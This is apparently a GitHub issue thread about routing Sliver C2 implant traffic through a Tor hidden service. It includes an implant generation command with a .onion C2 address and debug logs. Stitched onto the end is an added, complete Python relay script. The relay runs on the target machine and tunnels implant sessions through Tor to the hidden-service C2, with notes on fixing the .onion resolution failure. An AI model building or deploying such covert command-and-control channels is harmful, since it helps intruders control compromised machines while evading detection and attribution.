
Comments (2)

pixelBaron117 avatar pixelBaron117 commented on July 1, 2024

generate --http [hidden].onion:6969?proxy=127.0.0.1:9050 -o windows -G -d -O dbg

sliver > jobs

 ID   Name   Protocol   Port   Stage Profile 
==== ====== ========== ====== ===============
 11   http   tcp        6969          

output :

2024/05/22 20:35:30 session.go:172: Connecting -> http(s)://[hidden].onion:6969
2024/05/22 20:35:30 session.go:84: Next CC = https://[hidden].onion:6969?proxy=127.0.0.1:9050
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 transports.go:92: Yield c2 uri = 'https://[hidden].onion:6969?proxy=127.0.0.1:9050'
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = rpc, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2354917 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = register, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2394831 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 session.go:178: http(s) connection error Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:158: [session] failed to establish connection: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:138: Reconnect sleep: 1m0s

It seems the proxy is correctly used, but the sessions can't connect to the hidden service.

The hidden service Tor configuration:

# This is the configuration for Tor
SocksPort 9050 # 

# HiSer
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 6969 127.0.0.1:6969

Based on the debug output, the implant seems to behave correctly, using the proxy and sending HTTP requests. According to my information, the Tor proxy is compatible with standard HTTP requests. Therefore, I don't understand why it isn't working.

from sliver.

pixelBaron117 avatar pixelBaron117 commented on July 1, 2024

While waiting for potential integration into Sliver, I've created a Python script that serves as a relay to route communications through the Tor network using an mTLS agent.
How It Works:

Agent Communication:
    The Sliver agent is configured to communicate with 127.0.0.1:6666, thinking it is directly talking to the Sliver C2 server.

Proxy on the Target:
    A Python proxy script runs on the target machine and listens on 127.0.0.1:6666 for incoming connections from the Sliver agent.

Redirection Through Tor:
    The proxy script establishes a connection to the Sliver C2 server using the Tor network. This is done through a SOCKS5 proxy running on 127.0.0.1:9050 towards the hidden service (.onion address).

Data Forwarding:
    The script forwards all data from the Sliver agent to the Sliver C2 server through Tor and sends back responses to the agent, ensuring seamless bidirectional communication.

Detailed Setup:
Sliver C2 Server:

The Sliver C2 server listens on port 9999 for incoming connections.

Tor Hidden Service:

Configure the hidden service to listen on port 9999 and forward traffic to port 9999 on the Sliver C2 server.
The .onion address of this hidden service is used by the proxy script to route traffic through Tor.

Python Proxy Script:

The proxy script runs on the target machine.
It listens on 127.0.0.1:6666 for connections from the Sliver agent.
When a connection is received, the proxy script uses PySocks to establish a connection to the hidden service address through the Tor network.
It then forwards all data from the Sliver agent to the Sliver C2 server through the Tor network and vice versa.

This setup allows the mTLS agent to route its communications securely through the Tor network without any modifications to the Sliver agent itself.

I am currently testing its robustness; not sure if it will work great...

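The relay the comment above describes, written out as an added example (this is not the commenter's script and not part of Sliver). It listens on 127.0.0.1:6666 and tunnels each accepted connection to the hidden service through Tor's SocksPort on 127.0.0.1:9050. The SOCKS5 CONNECT is done by hand rather than through PySocks so that the .onion name is handed to Tor as a domain name (ATYP 0x03) and is never passed to the system resolver; a local resolver has no answer for a .onion name, which is exactly what a "lookup ...onion: no such host" error means. The host name `example.onion` and the port numbers 6666, 9050 and 9999 are placeholders taken from the thread, not real infrastructure.

```python
# Added example: local TCP relay implant -> 127.0.0.1:6666 -> Tor SOCKS5 -> .onion
# Not the issue author's script; host/ports below are placeholders from the thread.
import socket
import struct
import threading

LISTEN_ADDR = ("127.0.0.1", 6666)   # where the mTLS implant is configured to connect
TOR_SOCKS = ("127.0.0.1", 9050)     # Tor SocksPort from the torrc posted above
ONION_HOST = "example.onion"        # placeholder: the hidden service name
ONION_PORT = 9999                   # placeholder: HiddenServicePort of the C2


def socks5_connect_request(host: str, port: int) -> bytes:
    """Build a SOCKS5 CONNECT with a domain-name address (ATYP 0x03).

    Sending the name lets Tor resolve it. Resolving a .onion name with the
    system resolver fails ('no such host') and leaks the name to DNS.
    """
    name = host.encode("idna")
    if not 0 < len(name) <= 255:
        raise ValueError("SOCKS5 domain names must be 1..255 bytes")
    return b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack("!H", port)


def parse_socks5_reply(data: bytes) -> int:
    """Return the REP code of a SOCKS5 reply header (0x00 means succeeded)."""
    if len(data) < 2 or data[0] != 0x05:
        raise ConnectionError("not a SOCKS5 reply")
    return data[1]


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; SOCKS headers may arrive in several segments."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed during SOCKS5 handshake")
        buf += chunk
    return buf


def socks5_connect(proxy, host: str, port: int, timeout: float = 90.0) -> socket.socket:
    """Open a TCP stream to host:port through a SOCKS5 proxy (no authentication)."""
    sock = socket.create_connection(proxy, timeout=timeout)
    try:
        sock.sendall(b"\x05\x01\x00")                 # version 5, one method: no auth
        if recv_exact(sock, 2) != b"\x05\x00":
            raise ConnectionError("proxy refused no-auth SOCKS5")
        sock.sendall(socks5_connect_request(host, port))
        head = recv_exact(sock, 4)                    # VER REP RSV ATYP
        rep = parse_socks5_reply(head)
        if rep != 0:
            raise ConnectionError(f"SOCKS5 CONNECT failed, REP={rep:#x}")
        atyp = head[3]                                # drain BND.ADDR + BND.PORT
        if atyp == 0x01:
            recv_exact(sock, 4 + 2)
        elif atyp == 0x04:
            recv_exact(sock, 16 + 2)
        elif atyp == 0x03:
            recv_exact(sock, recv_exact(sock, 1)[0] + 2)
        else:
            raise ConnectionError("unknown ATYP in SOCKS5 reply")
    except Exception:
        sock.close()
        raise
    sock.settimeout(None)                             # Tor circuits can be slow; no idle timeout
    return sock


def pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until EOF, then half-close the destination."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle_client(client: socket.socket) -> None:
    try:
        upstream = socks5_connect(TOR_SOCKS, ONION_HOST, ONION_PORT)
    except (OSError, ConnectionError):
        client.close()          # the implant sees a closed socket and reconnects on its own schedule
        return
    threading.Thread(target=pump, args=(client, upstream), daemon=True).start()
    pump(upstream, client)      # returns once the C2 side closes


def serve(listen=LISTEN_ADDR) -> None:
    with socket.create_server(listen) as srv:
        while True:
            client, _ = srv.accept()
            threading.Thread(target=handle_client, args=(client,), daemon=True).start()


if __name__ == "__main__":
    serve()
```

The relay only moves bytes: the implant's mTLS handshake still terminates at the Sliver server, so the relay cannot read or alter the session and the implant's certificate pinning is unaffected. When Tor cannot build a circuit the SOCKS5 reply carries a non-zero REP code, the relay drops the client connection, and the implant falls back to its normal reconnect interval.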
